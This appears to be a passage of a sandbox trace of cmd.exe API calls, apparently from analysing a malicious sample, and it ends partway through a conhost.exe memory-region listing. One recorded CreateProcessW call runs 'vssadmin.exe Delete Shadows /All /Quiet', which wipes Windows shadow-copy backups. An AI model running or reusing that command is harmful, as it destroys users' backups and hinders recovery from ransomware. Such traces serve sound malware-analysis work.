[0095.657] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0095.657] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0095.657] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0095.657] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0095.657] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0095.657] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0095.657] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0095.657] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0095.657] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.658] FreeEnvironmentStringsA (penv="A") returned 1 [0095.658] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.658] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.658] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0095.658] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0095.658] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0095.658] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0095.658] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0095.658] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0095.658] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0095.658] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0095.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4affad4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.658] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4affad4, lpFilePart=0x4affacc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4affacc*="Desktop") returned 0x1d [0095.658] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.658] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4aff850 | out: lpFindFileData=0x4aff850) returned 0x4ea05c8 [0095.658] FindClose (in: hFindFile=0x4ea05c8 | out: hFindFile=0x4ea05c8) returned 1 [0095.658] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4aff850 | out: lpFindFileData=0x4aff850) returned 0x4ea05c8 [0095.658] FindClose (in: hFindFile=0x4ea05c8 | out: hFindFile=0x4ea05c8) returned 1 [0095.658] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0095.658] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4aff850 | out: lpFindFileData=0x4aff850) returned 0x4ea05c8 [0095.658] FindClose (in: hFindFile=0x4ea05c8 | out: hFindFile=0x4ea05c8) returned 1 [0095.659] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0095.659] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0095.659] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0095.659] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.659] FreeEnvironmentStringsA (penv="=") returned 1 [0095.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.659] GetConsoleOutputCP () returned 0x1b5 [0095.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.659] GetUserDefaultLCID () returned 0x409 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4affc04, cchData=128 | out: lpLCData="0") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4affc04, cchData=128 | out: lpLCData="0") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4affc04, cchData=128 | out: lpLCData="1") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0095.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0095.660] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0095.661] GetConsoleTitleW (in: lpConsoleTitle=0x4eaaa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.661] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.661] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0095.661] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0095.661] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0095.662] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0095.662] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0095.662] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0095.662] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0095.662] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0095.662] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0095.662] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0095.663] GetConsoleTitleW (in: lpConsoleTitle=0x4aff8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.663] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vssadmin.exe")) returned 0xffffffff [0095.663] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0095.663] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0095.663] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0095.664] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0095.664] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0095.664] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0095.664] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0095.664] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0095.664] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0095.664] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0095.664] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0095.664] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0095.664] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0095.664] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0095.664] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0095.664] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0095.664] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0095.664] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0095.664] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0095.664] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0095.664] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0095.664] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0095.664] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0095.664] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0095.664] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0095.664] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0095.664] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0095.664] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0095.664] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0095.664] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0095.664] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0095.664] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0095.664] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0095.664] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0095.664] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0095.664] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0095.664] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0095.664] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0095.664] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0095.664] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0095.664] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0095.664] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0095.665] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0095.665] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0095.665] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0095.665] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0095.665] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0095.665] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0095.665] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0095.665] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0095.665] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0095.665] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0095.665] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0095.665] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0095.665] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0095.665] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0095.665] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0095.665] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0095.665] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0095.665] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0095.665] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0095.665] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0095.665] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0095.665] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0095.665] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0095.665] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0095.665] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0095.665] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0095.665] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0095.665] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0095.665] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0095.665] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0095.665] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0095.665] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0095.665] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0095.665] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0095.665] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0095.666] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0095.666] SetErrorMode (uMode=0x0) returned 0x0 [0095.666] SetErrorMode (uMode=0x1) returned 0x0 [0095.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4eaafb8, lpFilePart=0x4aff3fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4aff3fc*="Desktop") returned 0x1d [0095.666] SetErrorMode (uMode=0x0) returned 0x1 [0095.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.667] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0095.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.674] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x4aff1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4aff1a8) returned 0xffffffff [0095.675] GetLastError () returned 0x2 [0095.675] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x4aff188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4aff188) returned 0xffffffff [0095.675] GetLastError () returned 0x2 [0095.675] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.675] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x4aff1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4aff1a8) returned 0xffffffff [0095.675] GetLastError () returned 0x2 [0095.675] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x4aff188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4aff188) returned 0xffffffff [0095.675] GetLastError () returned 0x2 [0095.675] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0095.675] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x4aff1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4aff1a8) returned 0x4eab1f8 [0095.675] FindClose (in: hFindFile=0x4eab1f8 | out: hFindFile=0x4eab1f8) returned 1 [0095.676] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0095.676] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0095.676] GetConsoleTitleW (in: lpConsoleTitle=0x4aff67c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0095.676] InitializeProcThreadAttributeList (in: lpAttributeList=0x4aff5a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4aff58c | out: lpAttributeList=0x4aff5a8, lpSize=0x4aff58c) returned 1 [0095.676] UpdateProcThreadAttribute (in: lpAttributeList=0x4aff5a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x4aff594, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4aff5a8, lpPreviousValue=0x0) returned 1 [0095.676] GetStartupInfoW (in: lpStartupInfo=0x4aff5e0 | out: lpStartupInfo=0x4aff5e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0095.677] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0095.677] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0095.678] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe Delete Shadows \\/All \\/Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4aff530*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe Delete Shadows \\/All \\/Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4aff57c | out: lpCommandLine="vssadmin.exe Delete Shadows \\/All \\/Quiet", lpProcessInformation=0x4aff57c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xb0c, dwThreadId=0x544)) returned 1 [0095.787] CloseHandle (hObject=0xa4) returned 1 [0095.787] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0095.787] GetEnvironmentStringsW () returned 0x4ea9f00* [0095.787] FreeEnvironmentStringsA (penv="=") returned 1 [0095.787] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0095.928] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4aff514 | out: lpExitCode=0x4aff514*=0x2) returned 1 [0095.929] CloseHandle (hObject=0xa8) returned 1 [0095.929] _vsnwprintf (in: _Buffer=0x4aff5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x4aff51c | out: _Buffer="00000002") returned 8 [0095.929] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0095.929] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.929] FreeEnvironmentStringsA (penv="=") returned 1 [0095.929] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0095.929] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.929] FreeEnvironmentStringsA (penv="=") returned 1 [0095.929] DeleteProcThreadAttributeList (in: lpAttributeList=0x4aff5a8 | out: lpAttributeList=0x4aff5a8) [0095.929] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.929] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.929] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.929] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.929] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.929] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.930] SetConsoleInputExeNameW () returned 0x1 [0095.930] GetConsoleOutputCP () returned 0x1b5 [0095.930] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.930] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.930] exit (_Code=2) Thread: id = 37 os_tid = 0x838 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x783f9000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x764" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 695 start_va = 0x7f1b8000 end_va = 0x7f1b8fff entry_point = 0x0 region_type = private name = "private_0x000000007f1b8000" filename = "" Region: id = 696 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 697 start_va = 0x6029690000 end_va = 0x60296affff entry_point = 0x0 region_type = private name = "private_0x0000006029690000" filename = "" Region: id = 698 start_va = 0x60296b0000 end_va = 0x60296c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000060296b0000" filename = "" Region: id = 699 start_va = 0x60296d0000 end_va = 0x602970ffff entry_point = 0x0 region_type = private name = "private_0x00000060296d0000" filename = "" Region: id = 700 start_va = 0x7df5ffae0000 end_va = 0x7ff5ffadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffae0000" filename = "" Region: id = 701 start_va = 0x7ff6c42f0000 end_va = 0x7ff6c4312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42f0000" filename = "" Region: id = 702 start_va = 0x7ff6c4318000 end_va = 0x7ff6c4318fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4318000" filename = "" Region: id = 703 start_va = 0x7ff6c431e000 end_va = 0x7ff6c431ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c431e000" filename = "" Region: id = 704 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 705 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 706 start_va = 0x6029790000 end_va = 0x602988ffff entry_point = 0x0 region_type = private name = "private_0x0000006029790000" filename = "" Region: id = 707 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 708 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 709 start_va = 0x6029690000 end_va = 0x602969ffff entry_point = 0x0 region_type = pagefile_backed name 